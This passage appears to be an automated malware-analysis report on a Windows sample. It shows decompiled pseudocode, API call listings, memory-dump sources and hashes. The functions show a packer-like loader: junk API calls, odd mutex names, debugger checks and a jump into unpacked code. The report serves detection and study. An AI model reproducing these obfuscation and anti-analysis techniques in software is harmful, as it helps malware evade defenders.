                				 *0x42c20c = _t22;
                				 *0x42c208 = _t25;
                				 *0x42c204 = _t21;
                				 *0x42c200 = _t27;
                				 *0x42c1fc = _t26;
                				 *0x42c228 = ss;
                				 *0x42c21c = cs;
                				 *0x42c1f8 = ds;
                				 *0x42c1f4 = es;
                				 *0x42c1f0 = fs;
                				 *0x42c1ec = gs;
                				asm("pushfd");
                				_pop( *0x42c220);
                				 *0x42c214 =  *_t31;
                				 *0x42c218 = _v0;
                				 *0x42c224 =  &_a4;
                				 *0x42c160 = 0x10001;
                				_t11 =  *0x42c218; // 0x0
                				 *0x42c114 = _t11;
                				 *0x42c108 = 0xc0000409;
                				 *0x42c10c = 1;
                				_t12 =  *0x42a280; // 0x394af7
                				_v812 = _t12;
                				_t13 =  *0x42a284; // 0xffc6b508
                				_v808 = _t13;
                				 *0x42c158 = IsDebuggerPresent();
                				_push(1);
                				E00409A62(_t14);
                				SetUnhandledExceptionFilter(0);
                				_t17 = UnhandledExceptionFilter(0x401aec);
                				if( *0x42c158 == 0) {
                					_push(1);
                					E00409A62(_t17);
                				}
                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                			}



















                0x0040533b
                0x0040533b
                0x0040533b
                0x0040533b
                0x0040533b
                0x0040533b
                0x0040533b
                0x00405341
                0x00405343
                0x00405343
                0x004097c7
                0x004097cc
                0x004097d2
                0x004097d8
                0x004097de
                0x004097e4
                0x004097ea
                0x004097f1
                0x004097f8
                0x004097ff
                0x00409806
                0x0040980d
                0x00409814
                0x00409815
                0x0040981e
                0x00409826
                0x0040982e
                0x00409839
                0x00409843
                0x00409848
                0x0040984d
                0x00409857
                0x00409861
                0x00409866
                0x0040986c
                0x00409871
                0x0040987d
                0x00409882
                0x00409884
                0x0040988c
                0x00409897
                0x004098a4
                0x004098a6
                0x004098a8
                0x004098ad
                0x004098c1

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00409877
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040988C
                • UnhandledExceptionFilter.KERNEL32(00401AEC), ref: 00409897
                • GetCurrentProcess.KERNEL32(C0000409), ref: 004098B3
                • TerminateProcess.KERNEL32(00000000), ref: 004098BA
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: d837466445b4170ea709e65bdf9e48976520db9c1200a4fe055c2eeb5f5800fc
                • Instruction ID: 21d8e7ad53a1dc08df6e4edab417607fa4795ce5001b9851a04fb97e5a439dbe
                • Opcode Fuzzy Hash: d837466445b4170ea709e65bdf9e48976520db9c1200a4fe055c2eeb5f5800fc
                • Instruction Fuzzy Hash: 9221EA74A00305DFD720DF95F9C66583BA4BB18344F90807AE81893772EBB459928FAE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004084CF() {
                
                				SetUnhandledExceptionFilter(E0040848D);
                				return 0;
                			}



                0x004084d4
                0x004084dc

                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0000848D), ref: 004084D4
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 6f04be37edccb9c73464df98e5f1b3db6cbafd6d01814fe41fcf8fdf35cffb6f
                • Instruction ID: d0b837e2db365d5c5ce4375092b20700385d67de4693b74d46e8cf132d3f005c
                • Opcode Fuzzy Hash: 6f04be37edccb9c73464df98e5f1b3db6cbafd6d01814fe41fcf8fdf35cffb6f
                • Instruction Fuzzy Hash: 619002A065214686C7001BB06E0A64925A05A48712B56847A6495E5CE4FE7440846529
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.530504129.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: 6150048bdd162ab019e7f292e2be4eb24d30230505b004e1a0f91914bde488e1
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: 4C117072340104AFD754DE65DC95FB673EAEB88320B298155EA08CB312DA79EC01C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00403957(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a124, intOrPtr _a128, intOrPtr _a132, intOrPtr _a136, long _a140, struct _CONSOLE_CURSOR_INFO _a144, struct _DCB _a156, struct _OSVERSIONINFOW _a192, char _a448, short _a488, void _a2500, char _a3520) {
                				char _v0;
                				intOrPtr _v4;
                				intOrPtr _v8;
                				intOrPtr _v12;
                				char _v16;
                				intOrPtr _t296;
                				intOrPtr _t297;
                				intOrPtr _t298;
                				intOrPtr* _t444;
                				void* _t446;
                				intOrPtr* _t447;
                
                				do {
                					 *((char*)( *0x667ed4 + _t296)) =  *((intOrPtr*)( *0x66e6c0 + _t296 + 0x11b1b));
                					if( *0x667f64 == 0xa8) {
                						GetConsoleCursorInfo(0,  &_a144);
                						GetModuleFileNameW(0,  &_a488, 0);
                						EnumFontsW(0, L"hagayaxewewagucizinahegej", 0, 0);
                						GetVersionExW( &_a192);
                						__imp__GetConsoleAliasesLengthA(0);
                						SleepEx(0, 0);
                						CreateFileMappingW(0, 0, 0, 0, 0, 0);
                						CreateMutexA(0, 0, "wilofusasonamapofedahu");
                						GetCommState(0,  &_a156);
                						FreeConsole();
                						_t296 = _v4;
                					}
                					_t297 = _t296 + 1;
                					_a16 = _t297;
                				} while (_t297 <  *0x667f64);
                				_t298 = 0;
                				_a16 = 0;
                				do {
                					if( *0x667f64 + _t298 == 0xe) {
                						MapGenericMask(0, 0);
                						DebugBreak();
                						FreeConsole();
                						_v0(0);
                						FreeConsole();
                						InterlockedExchangeAdd( &_a140, 0);
                						WaitForMultipleObjectsEx(0, 0, 0, 0, 0);
                						_t298 = _a12;
                					}
                					_t298 = _t298 + 1;
                					_a16 = _t298;
                				} while (_t298 < 0x4fe229);
                				_t446 = 0x4cc;
                				do {
                					GetCharWidthW(0, 0, 0, 0);
                					GetCharABCWidthsFloatW(0, 0, 0, 0);
                					_t446 = _t446 - 1;
                				} while (_t446 != 0);
                				while(1) {
                					GetLastError();
                					if(_t446 < 0x3b9f945) {
                						_a36 = 0x3ae40fea;
                						_a88 = 0x4da9f927;
                						_a16 = 0x76dbcd96;
                						_a80 = 0x5c01b59;
                						_a68 = 0x69b972f0;
                						_a24 = 0x6315b1bc;
                						_a32 = 0x268efdf3;
                						_a92 = 0x758aab55;
                						_a72 = 0x293c9e6e;
                						_a64 = 0x7d25b6d7;
                						_a56 = 0x49f78072;
                						_a20 = 0x411e99f8;
                						_a12 = 0x58c56864;
                						_a124 = 0x3a5c90d5;
                						_a28 = 0x55787069;
                						_a132 = 0x61b5b59f;
                						_a112 = 0x739d0620;
                						_a52 = 0x3eef0288;
                						_a108 = 0x49cdaba2;
                						_a104 = 0x1f200a15;
                						_a4 = 0x6ab47c1e;
                						_a76 = 0x60bcbe35;
                						_v4 = 0x2247b61f;
                						_a84 = 0xb7d6359;
                						_a128 = 0xa8bb680;
                						_a44 = 0x5f860f6d;
                						_a60 = 0x1f006e87;
                						_a96 = 0x344135c6;
                						_v0 = 0x6da7e3e1;
                						_v16 = 0x479039f5;
                						_a100 = 0x9fa3415;
                						_a8 = 0x7c643086;
                						_v8 = 0x2694f336;
                						_v12 = 0x6cb4a5e8;
                						_a48 = 0x2d3a3b6a;
                						_a136 = 0x4b4207e4;
                						_a40 = 0x6a30f715;
                						_a140 = 0x40a7a320;
                						_a36 = _a36 - 0x3d2cd01f;
                						_a36 = _a36 - 0x1a8468ec;
                						_a88 = _a88 - 0x35b81e1b;
                						_a16 = _a16 - 0x1f2956f1;
                						_a88 = _a88 + 0x10bd938a;
                						_a88 = _a88 + 0x387b6b7d;
                						_a80 = _a80 + 0x55e9422f;
                						_a36 = _a36 + 0x2f9fc9;
                						_a80 = _a80 + 0x685f757d;
                						_a16 = _a16 + 0x18684b6a;
                						_a12 = _a12 + 0xc792e25;
                						_a28 = _a28 - 0x71c2a565;
                						_a56 = _a56 + 0x41d3e078;
                						_a16 = _a16 + 0x6066dbc4;
                						_a28 = _a28 - 0x1195370a;
                						_a56 = _a56 + 0x50570176;
                						_a16 = _a16 - 0x2bd3ed46;
                						_a108 = _a108 + 0x392008dc;
                						_a132 = _a132 - 0x5754d300;
                						_a76 = _a76 - 0x2ce43c9b;
                						_a12 = _a12 - 0x30721d20;
                						_a52 = _a52 - 0x2ccd0822;
                						_v4 = _v4 + 0x41048ed8;
                						_a112 = _a112 - 0xc569312;
                						_a76 = _a76 + 0x47dd74a5;
                						_a24 = _a24 - 0x28076cb2;
                						_a92 = _a92 - 0x436d683b;
                						_a112 = _a112 + 0x6106b7c4;
                						_a16 = _a16 - 0x41aae26e;
                						_a28 = _a28 - 0x5ce84155;
                						_a52 = _a52 + 0x2234c681;
                						_a80 = _a80 - 0x290d37f4;
                						_v0 = _v0 - 0x2476c0e6;
                						_a28 = _a28 - 0xfb5be67;
                						_v0 = _v0 + 0x69bdf9d;
                						_v12 = _v12 - 0x1cf7abbe;
                						_a20 = _a20 + 0xbea7d89;
                						_a76 = _a76 + 0x7a5b1c5b;
                						_a104 = _a104 - 0x18c76000;
                						_a92 = _a92 + 0x46a1d242;
                					}
                					if(_t446 > 0xbeedf1) {
                						break;
                					}
                					_t446 = _t446 + 1;
                					if(_t446 < 0x81043) {
                						continue;
                					}
                					break;
                				}
                				E00403660();
                				E00403770();
                				_t447 = __imp__ReplaceFileA;
                				_v16 = 0x7b;
                				do {
                					if( *0x667f64 == 0x86) {
                						 *_t447(0, 0, 0, 0, 0, 0);
                						WritePrivateProfileStringW(0, 0, 0, 0);
                					}
                					if( *0x667f64 == 0xf) {
                						lstrcmpiW(0, 0);
                						CreateEventW(0, 0, 0, 0);
                					}
                					_t287 =  &_v16;
                					 *_t287 = _v16 - 1;
                				} while ( *_t287 != 0);
                				_t444 = __imp__CreateActCtxA;
                				_v16 = 0x3078f;
                				do {
                					if( *0x667f64 == 0x83) {
                						MulDiv(0, 0, 0);
                						 *_t444( &_a144);
                						GetFileAttributesExW(0, 0,  &_a2500);
                						GetLogicalDriveStringsA(0,  &_a3520);
                						__imp__GetLongPathNameA(0,  &_a448, 0);
                						WritePrivateProfileStructW(0, 0, 0, 0, 0);
                						IsBadReadPtr(0, 0);
                						CancelWaitableTimer(0);
                						GetFileType(0);
                						GetModuleHandleA(0);
                					}
                					_t294 =  &_v16;
                					 *_t294 = _v16 - 1;
                				} while ( *_t294 != 0);
                				E004033B0();
                				 *0x667f58 =  *0x667ed4;
                				goto __eax;
                			}














                0x00403960
                0x00403973
                0x00403980
                0x0040398c
                0x0040399a
                0x004039a7
                0x004039b1
                0x004039b9
                0x004039c3
                0x004039d5
                0x004039e4
                0x004039f4
                0x004039fa
                0x004039fc
                0x004039fc
                0x00403a00
                0x00403a01
                0x00403a05
                0x00403a23
                0x00403a25
                0x00403a29
                0x00403a34
                0x00403a3a
                0x00403a3c
                0x00403a3e
                0x00403a42
                0x00403a44
                0x00403a50
                0x00403a60
                0x00403a66
                0x00403a66
                0x00403a6a
                0x00403a70
                0x00403a70
                0x00403a82
                0x00403a87
                0x00403a8f
                0x00403a99
                0x00403a9b
                0x00403a9b
                0x00403aa6
                0x00403aa6
                0x00403aae
                0x00403ab4
                0x00403abc
                0x00403ac4
                0x00403acc
                0x00403ad4
                0x00403adc
                0x00403ae4
                0x00403aec
                0x00403af4
                0x00403afc
                0x00403b04
                0x00403b0c
                0x00403b14
                0x00403b1c
                0x00403b27
                0x00403b2f
                0x00403b3a
                0x00403b45
                0x00403b4d
                0x00403b58
                0x00403b63
                0x00403b6b
                0x00403b73
                0x00403b7b
                0x00403b83
                0x00403b8e
                0x00403b96
                0x00403b9e
                0x00403ba9
                0x00403bb1
                0x00403bb9
                0x00403bc4
                0x00403bcc
                0x00403bd4
                0x00403bdc
                0x00403be4
                0x00403bef
                0x00403bf7
                0x00403c02
                0x00403c24
                0x00403c2c
                0x00403c41
                0x00403c63
                0x00403c6b
                0x00403c73
                0x00403c7b
                0x00403c83
                0x00403c98
                0x00403ca0
                0x00403ca8
                0x00403cbd
                0x00403cd2
                0x00403ce7
                0x00403cfc
                0x00403d04
                0x00403d0c
                0x00403d17
                0x00403d22
                0x00403d2a
                0x00403d32
                0x00403d3a
                0x00403d42
                0x00403d4d
                0x00403d75
                0x00403daa
                0x00403db2
                0x00403dd7
                0x00403dec
                0x00403df4
                0x00403e1c
                0x00403e24
                0x00403e2c
                0x00403e34
                0x00403e3c
                0x00403e57
                0x00403e6c
                0x00403e74
                0x00403e7f
                0x00403e7f
                0x00403e8d
                0x00000000
                0x00000000
                0x00403e8f
                0x00403e96
                0x00000000
                0x00000000
                0x00000000
                0x00403e96
                0x00403e9c
                0x00403ea1
                0x00403ea6
                0x00403ebe
                0x00403ed0
                0x00403eda
                0x00403ee8
                0x00403ef2
                0x00403ef2
                0x00403efb
                0x00403f01
                0x00403f0b
                0x00403f0b
                0x00403f0d
                0x00403f0d
                0x00403f0d
                0x00403f1a
                0x00403f2c
                0x00403f34
                0x00403f3e
                0x00403f46
                0x00403f50
                0x00403f5e
                0x00403f6a
                0x00403f78
                0x00403f88
                0x00403f92
                0x00403f9a
                0x00403fa2
                0x00403faa
                0x00403faa
                0x00403fb0
                0x00403fb0
                0x00403fb0
                0x00403fbb
                0x00403fc5
                0x00403fd4

                APIs
                • GetConsoleCursorInfo.KERNEL32(00000000,?), ref: 0040398C
                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040399A
                • EnumFontsW.GDI32(00000000,hagayaxewewagucizinahegej,00000000,00000000), ref: 004039A7
                • GetVersionExW.KERNEL32(?), ref: 004039B1
                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004039B9
                • SleepEx.KERNEL32(00000000,00000000), ref: 004039C3
                • CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004039D5
                • CreateMutexA.KERNEL32(00000000,00000000,wilofusasonamapofedahu), ref: 004039E4
                • GetCommState.KERNEL32(00000000,?), ref: 004039F4
                • FreeConsole.KERNEL32 ref: 004039FA
                • MapGenericMask.ADVAPI32(00000000,00000000), ref: 00403A3A
                • DebugBreak.KERNEL32 ref: 00403A3C
                • FreeConsole.KERNEL32 ref: 00403A3E
                • AttachConsole.KERNEL32(00000000), ref: 00403A42
                • FreeConsole.KERNEL32 ref: 00403A44
                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00403A50
                • WaitForMultipleObjectsEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403A60
                • GetCharWidthW.GDI32(00000000,00000000,00000000,00000000), ref: 00403A8F
                • GetCharABCWidthsFloatW.GDI32(00000000,00000000,00000000,00000000), ref: 00403A99
                • GetLastError.KERNEL32 ref: 00403AA6
                • ReplaceFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403EE8
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403EF2
                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403F01
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F0B
                • MulDiv.KERNEL32(00000000,00000000,00000000), ref: 00403F46
                • CreateActCtxA.KERNEL32(?), ref: 00403F50
                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00403F5E
                • GetLogicalDriveStringsA.KERNEL32 ref: 00403F6A
                • GetLongPathNameA.KERNEL32 ref: 00403F78
                • WritePrivateProfileStructW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403F88
                • IsBadReadPtr.KERNEL32(00000000,00000000), ref: 00403F92
                • CancelWaitableTimer.KERNEL32(00000000), ref: 00403F9A
                • GetFileType.KERNEL32(00000000), ref: 00403FA2
                • GetModuleHandleA.KERNEL32(00000000), ref: 00403FAA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: Console$File$Create$Free$CharModuleNamePrivateProfileWrite$AliasesAttachAttributesBreakCancelCommCursorDebugDriveEnumErrorEventExchangeFloatFontsGenericHandleInfoInterlockedLastLengthLogicalLongMappingMaskMultipleMutexObjectsPathReadReplaceSleepStateStringStringsStructTimerTypeVersionWaitWaitableWidthWidthslstrcmpi
                • String ID: )O$;hmC$>P$TDu$UA\$hagayaxewewagucizinahegej$j;:-$wilofusasonamapofedahu${${*,$}k{8$}u_h
                • API String ID: 1899468939-3306136125
                • Opcode ID: 2e2ecd3971922190b2c5bb1d85dbd43ab1665a490a6c8ae08c4110cafdc87cda
                • Instruction ID: 829d75c2ae4df94ea4db4ecf5691a90b83a113486eb31741d8e040f6f05984f1
                • Opcode Fuzzy Hash: 2e2ecd3971922190b2c5bb1d85dbd43ab1665a490a6c8ae08c4110cafdc87cda
                • Instruction Fuzzy Hash: C6F175756083809FD3609F66D986B4ABBF4FB84704F10491DF6D9AB2A0C7B49984CF4B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00403660(intOrPtr _a4, struct _SMALL_RECT _a8, unsigned int _a12, char _a40, short _a1064, char _a3100) {
                				struct _SMALL_RECT _v0;
                				struct _CHAR_INFO _v4;
                				long _v8;
                				struct _COORD _v16;
                				unsigned int _t21;
                				intOrPtr* _t34;
                				intOrPtr _t35;
                
                				L0040EBC0(0x142c);
                				_t35 =  *0x667ed4;
                				_t21 =  *0x667f64 >> 3;
                				if(_t21 > 0) {
                					_t34 = __imp__FindNextVolumeA;
                					_a4 = _t35;
                					_a12 = _t21;
                					do {
                						if( *0x667f64 == 0x959) {
                							GetNumberFormatW(0, 0, L"bisasijucifaw", 0,  &_a1064, 0);
                							GetModuleHandleA("bizifoditutig");
                							 *_t34(0,  &_a40, 0);
                							GetModuleFileNameA(0, 0, 0);
                							__imp__FindFirstVolumeMountPointW(L"povinatufopewehepogiyexaveboside",  &_a3100, 0);
                							_v16.Y = 0;
                							_v16.X = 0;
                							ScrollConsoleScreenBufferA(0,  &_v0,  &_a8, _v16,  &_v4);
                							GetModuleHandleW(L"mojuforafuzudogudukeyitofoh");
                							InterlockedExchangeAdd( &_v8, 0);
                							GetCurrentThreadId();
                						}
                						_t21 = E00403450(_a4);
                						_v0.Left = _v0.Left + 8;
                						_t16 =  &_a8;
                						 *_t16 = _a8.Left - 1;
                					} while ( *_t16 != 0);
                				}
                				return _t21;
                			}










                0x00403665
                0x0040366f
                0x00403677
                0x0040367e
                0x00403690
                0x0040369c
                0x004036a0
                0x004036a4
                0x004036ae
                0x004036c9
                0x004036d0
                0x004036db
                0x004036e3
                0x004036f4
                0x004036fe
                0x00403708
                0x0040371e
                0x00403729
                0x00403736
                0x0040373c
                0x0040373c
                0x00403747
                0x0040374c
                0x00403751
                0x00403751
                0x00403751
                0x004036a4
                0x00403766

                APIs
                • GetNumberFormatW.KERNEL32 ref: 004036C9
                • GetModuleHandleA.KERNEL32(bizifoditutig), ref: 004036D0
                • FindNextVolumeA.KERNEL32(00000000,?,00000000), ref: 004036DB
                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000000), ref: 004036E3
                • FindFirstVolumeMountPointW.KERNEL32(povinatufopewehepogiyexaveboside,?,00000000), ref: 004036F4
                • ScrollConsoleScreenBufferA.KERNEL32(00000000,?,?,?,?), ref: 0040371E
                • GetModuleHandleW.KERNEL32(mojuforafuzudogudukeyitofoh), ref: 00403729
                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00403736
                • GetCurrentThreadId.KERNEL32 ref: 0040373C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: Module$FindHandleVolume$BufferConsoleCurrentExchangeFileFirstFormatInterlockedMountNameNextNumberPointScreenScrollThread
                • String ID: bisasijucifaw$bizifoditutig$mojuforafuzudogudukeyitofoh$povinatufopewehepogiyexaveboside
                • API String ID: 2995853831-2424065264
                • Opcode ID: 482c48cde1d95730a1d92f359f5e9431c195c781ef6e427e28cf541b6f36c516
                • Instruction ID: 19507b4272d04ca67e923924e88bede71011e0f8584c50739a0e9bb3dc9cb187
                • Opcode Fuzzy Hash: 482c48cde1d95730a1d92f359f5e9431c195c781ef6e427e28cf541b6f36c516
                • Instruction Fuzzy Hash: 5D21DB71248301AFD310EF61DE45F6B77B8EBC8B45F40442EF244A72E0C6B4AA44CB6A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00403EC8(char _a16, char _a176, char _a480, void _a2532, char _a3552) {
                				intOrPtr* _t31;
                				intOrPtr* _t33;
                
                				do {
                					if( *0x667f64 == 0x86) {
                						 *_t33(0, 0, 0, 0, 0, 0);
                						WritePrivateProfileStringW(0, 0, 0, 0);
                					}
                					if( *0x667f64 == 0xf) {
                						lstrcmpiW(0, 0);
                						CreateEventW(0, 0, 0, 0);
                					}
                					_t1 =  &_a16;
                					 *_t1 = _a16 - 1;
                				} while ( *_t1 != 0);
                				_t31 = __imp__CreateActCtxA;
                				_a16 = 0x3078f;
                				do {
                					if( *0x667f64 == 0x83) {
                						MulDiv(0, 0, 0);
                						 *_t31( &_a176);
                						GetFileAttributesExW(0, 0,  &_a2532);
                						GetLogicalDriveStringsA(0,  &_a3552);
                						__imp__GetLongPathNameA(0,  &_a480, 0);
                						WritePrivateProfileStructW(0, 0, 0, 0, 0);
                						IsBadReadPtr(0, 0);
                						CancelWaitableTimer(0);
                						GetFileType(0);
                						GetModuleHandleA(0);
                					}
                					_t8 =  &_a16;
                					 *_t8 = _a16 - 1;
                				} while ( *_t8 != 0);
                				E004033B0();
                				 *0x667f58 =  *0x667ed4;
                				goto __eax;
                			}





                0x00403ed0
                0x00403eda
                0x00403ee8
                0x00403ef2
                0x00403ef2
                0x00403efb
                0x00403f01
                0x00403f0b
                0x00403f0b
                0x00403f0d
                0x00403f0d
                0x00403f0d
                0x00403f1a
                0x00403f2c
                0x00403f34
                0x00403f3e
                0x00403f46
                0x00403f50
                0x00403f5e
                0x00403f6a
                0x00403f78
                0x00403f88
                0x00403f92
                0x00403f9a
                0x00403fa2
                0x00403faa
                0x00403faa
                0x00403fb0
                0x00403fb0
                0x00403fb0
                0x00403fbb
                0x00403fc5
                0x00403fd4

                APIs
                • ReplaceFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403EE8
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403EF2
                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403F01
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F0B
                • MulDiv.KERNEL32(00000000,00000000,00000000), ref: 00403F46
                • CreateActCtxA.KERNEL32(?), ref: 00403F50
                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00403F5E
                • GetLogicalDriveStringsA.KERNEL32 ref: 00403F6A
                • GetLongPathNameA.KERNEL32 ref: 00403F78
                • WritePrivateProfileStructW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403F88
                • IsBadReadPtr.KERNEL32(00000000,00000000), ref: 00403F92
                • CancelWaitableTimer.KERNEL32(00000000), ref: 00403F9A
                • GetFileType.KERNEL32(00000000), ref: 00403FA2
                • GetModuleHandleA.KERNEL32(00000000), ref: 00403FAA
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: File$CreatePrivateProfileWrite$AttributesCancelDriveEventHandleLogicalLongModuleNamePathReadReplaceStringStringsStructTimerTypeWaitablelstrcmpi
                • String ID:
                • API String ID: 901593100-0
                • Opcode ID: f3f05c01b2b62f6b8c022d439cca62ae1031a8b82576fceb58765373a2d8033f
                • Instruction ID: 1e51498067b73abe089741691a4aa391f74c17f44d54677dbb9b545ee236fe69
                • Opcode Fuzzy Hash: f3f05c01b2b62f6b8c022d439cca62ae1031a8b82576fceb58765373a2d8033f
                • Instruction Fuzzy Hash: A8213631688384AFF360AF91ED46F9A7764EB44B16F104426F7486A1E0CBF46548CB6A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E004091D6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				struct HINSTANCE__* _t23;
                				intOrPtr _t28;
                				intOrPtr _t32;
                				intOrPtr _t45;
                				void* _t46;
                
                				_t35 = __ebx;
                				_push(0xc);
                				_push(0x428450);
                				E00407404(__ebx, __edi, __esi);
                				_t44 = L"KERNEL32.DLL";
                				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                				if(_t23 == 0) {
                					_t23 = E004084DD(_t44);
                				}
                				 *(_t46 - 0x1c) = _t23;
                				_t45 =  *((intOrPtr*)(_t46 + 8));
                				 *((intOrPtr*)(_t45 + 0x5c)) = 0x401a08;
                				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                				if(_t23 != 0) {
                					_t35 = GetProcAddress;
                					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                				}
                				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                				 *((char*)(_t45 + 0xc8)) = 0x43;
                				 *((char*)(_t45 + 0x14b)) = 0x43;
                				 *(_t45 + 0x68) = 0x42a7c8;
                				E00409F79(_t35, 1, 0xd);
                				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                				InterlockedIncrement( *(_t45 + 0x68));
                				 *(_t46 - 4) = 0xfffffffe;
                				E004092AB();
                				E00409F79(_t35, 1, 0xc);
                				 *(_t46 - 4) = 1;
                				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                				if(_t28 == 0) {
                					_t32 =  *0x42add0; // 0x42acf8
                					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                				}
                				E0040BCF6( *((intOrPtr*)(_t45 + 0x6c)));
                				 *(_t46 - 4) = 0xfffffffe;
                				return E00407449(E004092B4());
                			}








                0x004091d6
                0x004091d6
                0x004091d8
                0x004091dd
                0x004091e2
                0x004091e8
                0x004091f0
                0x004091f3
                0x004091f8
                0x004091f9
                0x004091fc
                0x004091ff
                0x00409209
                0x0040920e
                0x00409216
                0x0040921e
                0x0040922e
                0x0040922e
                0x00409234
                0x00409237
                0x0040923e
                0x00409245
                0x0040924e
                0x00409254
                0x0040925b
                0x00409261
                0x00409268
                0x0040926f
                0x00409275
                0x00409278
                0x0040927b
                0x00409280
                0x00409282
                0x00409287
                0x00409287
                0x0040928d
                0x00409293
                0x004092a4

                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00428450,0000000C,00409311,00000000,00000000,?,?,00406559,00406AC8), ref: 004091E8
                • __crt_waiting_on_module_handle.LIBCMT ref: 004091F3
